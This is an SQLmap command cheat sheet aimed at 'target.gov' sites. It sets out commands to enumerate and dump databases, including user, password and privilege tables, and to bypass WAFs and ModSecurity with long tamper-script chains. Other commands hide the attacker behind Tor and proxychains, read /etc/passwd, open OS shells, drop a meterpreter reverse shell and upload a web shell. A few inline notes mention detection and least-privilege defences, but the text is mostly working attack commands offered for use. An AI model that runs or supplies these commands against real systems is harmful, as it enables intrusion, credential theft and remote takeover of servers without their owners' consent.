
Mapped

This document provides SQLmap commands for scanning and exploiting SQL injection vulnerabilities. It includes basic commands for database, table, and column enumeration as well as commands for bypassing web application firewalls using tamper scripts. The document also includes special commands for techniques like HTTP header injection, second-order SQLi, and authentication-based scanning.

SQLmap Special Command

old release : 21 June 2021


new update : 4 June 2022
cr3at0r by Omest

1. BASIC COMMAND SQLMAP


- sqlmap -u "target.gov" --dbs --batch

- sqlmap -u "target.gov" -D ( name database ) --columns --batch

- sqlmap -u "target.gov" -D ( name database ) -T ( name table ) --columns --batch

- sqlmap -u "target.gov" -D ( name database ) -T ( name table ) -C ( name column )


--dump --batch

2. WAF BYPASS TYPE


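# generic attempt when a WAF answers "forbidden"
# (detection note: --random-agent replaces sqlmap's default "sqlmap/<version>" User-Agent, so a User-Agent block alone does not stop this run; --level 5 also places test strings in the Cookie, User-Agent, Referer and Host values, which is where they show up in request logs)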
- sqlmap -u "target.gov" --level 5 --dbs --random-agent -v 3

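# waf bypass using tamper scripts
# (tamper scripts only re-encode the payload: letter case, whitespace, comments, operators. A WAF that normalizes input before matching is unaffected by them, and so are parameterized queries in the application. --risk=3, used in several commands below, adds OR-based tests that can change data when the injection point sits in an UPDATE or DELETE statement.)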


- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --
tamper="between,randomcase,space2comment" --dbs --batch

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --dbs --batch

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --


tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs --batch

- sqlmap -u "target.gov/login" --data="userid=admin&passwd=admin" --method POST --


identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --
level=5 --risk=3 --dbs --batch

- sqlmap -u "target.gov" --level=5 --skip-waf --dbs --batch

- sqlmap -u "target.gov" --level=5 --risk=3 --random-agent --user-agent -v3 --batch


--threads=10 --dbs

- sqlmap -u "target.gov" --dbms="MySQL" -v3 --technique U --


tamper="space2mysqlblank.py" --dbs --batch

- sqlmap -u "target.gov" --dbms="MySQL" -v3 --technique U --tamper="space2comment"


--dbs --batch

- sqlmap -u "target.gov" -v3 --technique=T --no-cast --fresh-queries --banner --dbs


--batch

- sqlmap -u "target.gov" --level 2 --risk 3 --batch --dbs

- sqlmap -u "target.gov" -f -b --current-user --current-db --is-dba --users --dbs


--batch

- sqlmap -u "target.gov" --risk=3 --level=5 --random-agent --user-agent -v3 --batch


--threads=10 --dbs --batch

- sqlmap -u "target.gov" --risk 3 --level 5 --random-agent --proxy http://127.0.0.1:5980 --dbs --batch
- sqlmap -u "target.gov" --random-agent --dbms=MYSQL --dbs --technique=B" --batch

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --dbs --batch

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --


tamper="between,randomcase,space2comment" --dbs --batch

- sqlmap -u "target.gov" --parse-errors -v 3 --current-user --is-dba --banner -D


eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --
risk=3 --batch

- sqlmap -u "target.gov" --threads=10 --dbms=MYSQL --tamper=apostrophemask --


technique=E -D joomlab -T anz91_session -C session_id --dump --batch

- sqlmap -u "target.gov" --tables -D miss_db --is-dba --threads="10" --time-sec=10


--timeout=5 --no-cast --

tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --
identify-waf --random-agent --batch

- sqlmap -u "target.gov" -v 3 --dbms "MySQL" --technique U -p id --batch --tamper


"space2morehash.py"

- sqlmap -u "target.gov" --banner --safe-url=2 --safe-freq=3 --


tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2
--risk=2 --batch

- sqlmap -u "target.gov" -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --


tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member
--columns --batch

- sqlmap -u "target.gov" --level=5 --risk=3 --random-agent --


tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,non
recursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,s
pace2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltou
nion,unmagicquotes --dbms=mssql --batch

- sqlmap -u "target.gov" --level 5 --risk 3


tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,gr
eatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityze
roversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphe
re,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomb
lank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforward
edfor --dbms=mssql --batch

- sqlmap -u "target.gov" --level 5 --risk 3


tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,non
recursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,s
pace2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltou
nion,unmagicquotes --dbms=mssql -batch

- sqlmap -u "target.gov" --level 5 --risk 3


tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,ch
arencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonr
ecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,spa
ce2randomblank,unionalltounion,unmagicquotes --dbms=mssql --batch

- sqlmap -u "target.gov" --level=5 --risk=3 -p "id" –-


tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,blu
ecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,gre
atest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzer
oversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomme
nts,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblan
k,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_
password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" --
batch

- sqlmap -u "target.gov:80/search.cmd?form_state=1" –level=5 –risk=3 -p ‘item1’ –


tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,blue
coat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,grea
test,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzero
versioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcommen
ts,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank
,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_p
assword,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords --
batch

-sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-


port=9050 --dbs --dbms "MySQL" --current-db --random-agent --batch

- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-


port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE"
--tables --batch

- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-


port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -
T "edt_usuarios" --columns --batch

- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-


port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -
T "edt_usuarios" -C "ud,email,usuario,contra" --dump --batch

- sqlmap -u "target.gov"
tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,mul
tiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.
py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldas
h.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --
dbms=mssql --batcH

# bypass 403 forbidden


- sqlmap -u "target.gov" -v3 --dbms="MySql" --risk=3 --level=3 --technique=BU --
tamper="space2mysqlblank.py" --random-agent --batch --dbs --no-cast --batch

# bypass 403 Not Acceptable


- sqlmap -u "target.gov" --level 5 --dbs --random-agent -v 3 --batch

# bypass 500 internal server error


--sqlmap -u "target.gov" --dbs --tamper=modsecurityzeroversioned -v 3 --batch

# bypass waf dump table 500 internal server error


- sqlmap -u "target.gov" --dbs --tamper=modsecurityzeroversioned,multiplespaces.py
-v 3 --batch

# bypass waf Mod Security


- sqlmap -u "target.gov" --random-agent --tamper=modsecurityversioned --level=3 --
risk=3 -v 3 --dbs --batcH

3. SPECIAL COMMAND
# upload on header PUT
- sqlmap --method=PUT -u "target.gov" --headers="referer:*" --batch

# retrieve information
- sqlmap -u "target.gov" --users --passwords --privileges --roles --threads=10 --
batch

# Referer header
- sqlmap -u "target.gov" --headers="referer:*" --batch

# header injection to combination sql


- sqlmap -u "target.gov" --headers="x-forwarded-for:127.0.0.1*" --batch

# injection in header and other HTTP method


> inside cookie
- sqlmap -u "target.gov" --cookie "mycookies=*" --batch

> inside some HEADER


- sqlmap -u "target.gov" --headers="x-forwarded-for:127.0.0.1*" --batch
- sqlmap -u "target.gov" --headers="referer:*" --batch

> PUT method


- sqlmap --method=PUT -u "target.gov" --headers="referer:*" --batch

# Verbose
- sqlmap -u "target.gov" -v 3 --batch

# indicate the string that is shown when the injected condition is TRUE


- sqlmap -u "target.gov" --string="string_showed_when_TRUE"

# scanning form
- sqlmap -u "target.gov" -u "target.gov/admin/login.php" --form --dbs --batch

# force ssl/https
- sqlmap -r a.req --force-ssl --users --batch

# specify the parameter to test in a saved request file


- sqlmap -r login.req -p Password --dbms=mssql -v 3 --batch --level 5 --risk 3 --
batch

# customizing the injection
> set a suffix injection
- sqlmap -u "target.gov/?id=1" -p id --suffix="-- " --batch
> set a prefix injection
- sqlmap -u "target.gov/?id=1" -p id --prefix="') " --batch

# second order injection


- sqlmap -r /tmp/r.txt --dbms MySQL --second-order "target.gov" -v 3 --batch
- sqlmap -r 1.txt -dbms MySQL -second-order
"http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs --batch
- sqlmap -r /root/Desktop/Burp.txt –second -order “target.gov” --batch

# running query sql


- sqlmap -u nz3666ghost.to/cat.php?id=2 –sql-shell --batch

# scanning a page behind HTTP authentication ( Basic, NTLM, Digest )

- sqlmap -u http://example.com/admin.aspx --auth-type Basic --auth-cred "admin:admin" --batch
# scanning a page that requires a client certificate or private key
- sqlmap -u http://example.com/admin.aspx --auth-file=<PEM certificate or private key file> --batch

# use network anonim TOR vpn


- sqlmap -u "target.gov/admin.aspx" –tor --batch
> set port tor
- sqlmap -u "target.gov/admin/aspx" –tor-port = <tor proxy port> --batch

# request delay HTTP


- sqlmap -u "target.gov/admin.aspx" –delay = delay 1 # 1 second --batch

# page protected by a CSRF ( Cross-Site Request Forgery ) token


- sqlmap -u "target.gov/admin.aspx" –csrf-token = <csrf token> --batch

# finding boolean injection


- sqlmap -r r.txt -p id --not-string ridiculous --batch

# request injection
- sqlmap -u "target.gov/test.php?id=1" -p id --batch
- sqlmap -u "target.gov/test.php?id=1" * --batch

# injection from file


- sqlmap -r request.txt --batch

# testing with pattern URL's


- sqlmap -u "target.gov/page/*/view" --dbs --batch

# using cookies
- sqlmap -u "target.gov/enter.php" --cookie="" -u "target.gov/index.php?id=1" --dbs
--batch

# identify current database


- sqlmap -u "target.gov/page.php?id=1" --current-db --batch

# multi threading
- sqlmap -u "target.gov/page.php?id=1" --dbs --threads 5 --batch

# null connection
- sqlmap -u "target.gov/page.php?id=1" --dbs --null-connection --batch

# HTTP persistent connection


- sqlmap -u "target.gov/page.php?id=1" --dbs --keep-alive --batch

# output prediction
- sqlmap -u "target.gov/page.php?id=1" -D database -T user -c users,password --dump
--predict-output --batch

# checking privileges
- sqlmap -u "target.gov/page.php?id=1" --privileges --batch

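# reading a file from the server
# (only possible when the database account the application connects with holds file-read rights, e.g. the MySQL FILE privilege; an application account without them blocks this)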


- sqlmap -u "target.gov/page.php?id=1" --file-read=/etc/passwd --batch

# using proxy
- sqlmap --proxy="127.0.0.1:8080" -u "target.gov/page.php?id=1" --dbs --batch

# using proxy with credentials


- sqlmap -–proxy="127.0.0.1:8080" –-proxy-cred=username:password -u
"target.gov/page.php?id=1" --batch

4. CRAWLING INJECTION
- sqlmap -u "target.gov" --crawl=1 --forms --dbs --batch

- sqlmap -u "target.gov" --crawal=10 --forms --dbs --batch

- sqlmap -u "target.gov" --crawl=2 --forms --dbs --batch

- sqlmap --threads 10 --batch --crawl 1 --forms -u "target.gov" --tamper


space2comment --dbs --batch

- sqlmap -u "target.gov" --crawl=1 --random-agent --batch --forms --threads=5 --


level=5 --risk=3

- sqlmap -u "target.gov" –crawl = 3 –cookie = "" –crawl-exclude = "logout" --batch

- sqlmap -u "target.gov" --dbms=mysql --crawl=3 --batch

- sqlmap -u "<targetip>" --forms --batch --crawl=10 --cookie=jsessionid=54321 --


level 4 --risk 3 --batch

- sqlmap -u "target.gov" --crawl=1 --random-agent --batch --forms --threads=5 --


level=5 --risk=3

5. SQL POST DATA


- sqlmap -u "target.gov" --data="email=omest&password=omest" --method POST --dbs --
batch

6. PARAMETER INJECTION
- sqlmap -u "target.gov" --banner --dbs --batch

7. BURPSUITE/SANDROPROXXY > SQLMAP


> POST request
- sqlmap -r target.txt -p username --batch
- sqlmap -r target.txt -p username --dump --batch

> capture request and create req.txt file


- sqlmap -r req.txt --current-user --batch

> GET request injection


- sqlmap -u "target.gov" -p id --batch
- sqlmap -u "http://example.com/?id=*" -p id --batch

> POST request injection


- sqlmap -u "target.gov" --data "username=*&password=*" --dbs --batch

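8. SQLMAP OS SHELL
(the options in this section depend on the database account being able to write files or run commands on the database host; a least-privilege account with no FILE privilege and no xp_cmdshell, together with a web root the database service cannot write to, prevents them)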
> basic operating system shell ( Linux )
- sqlmap -u "target.gov/leet.php?id=1337" --os-shell --batch

> basic operating system command prompt ( Windows )


- sqlmap -u "target.gov/leet.php?id=1337" --os-cmd ( command windows ) --batch

> simple shell


- sqlmap -u "target.gov/?id=1" -p id --os-shell --batch

> exec command os windows


- sqlmap -u "target.gov/?id=1" -p id --os-cmd whoami
> dropping reverse shell ( meterpreter )
- sqlmap -u "target.gov/?id=1" -p id --os-pwn --batch
--file-read=/etc/passwd ( read file )

> os uploading shell


- sqlmap -u "target.gov/page.php?id=1" --file-write=path/shell.php --file-
dest=path/shell.php --batch

> os write commad


- sqlmap -u "target.gov/page.php?id=1" --os-shell --batch
after successfully get OS shell
write some file, example
echo "leet" >> haxor.txt

> os shell cookies injection and skipping waf


- sqlmap -u "target.gov/pussy.php?cat=123" --threads=10 --cookie="cookies" --skip-
waf --os-shell --batch

9. SQLMAP WITH PROXYCHAINS ( TOR )


> update and upgrade
- sudo apt-get update;sudo apt-get upgrade

> install proxychains & tor


- sudo apt-get purge proxychains;sudo apt-get purge proxychains4;sudo apt-get
purge tor
- sudo apt-get install proxychains4;sudo apt-get install proxychains;sudo apt-get
install tor
- which proxychains;which proxychains4;which tor

> setting configuration proxychains using text editor terminal like nano,vim,micro
and etc
- micro /etc/proxychains.conf
WARNING !
listen
delete hastag coment ( # ) in dynamic_chain, and add hastag coment ( # ) in
strict_chain one more and delete hastag coment ( # ) in random_chain

add socks5 below socks4


example
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050 ( here add new socks with socks5 like this )

fix line in hastag coment # proxylist format, example you just space line so that
it is parallel
and then save file configuration

- start tor with command sudo service tor start


- check status tor active with command sudo service tor status

and last run sqlmap tool with proxychains

dian@blackhat:~# proxychains sqlmap -u "target.gov" --dbs --batch

DONE
thanks bitch, i'm so tired write this tutorials fuck!!!
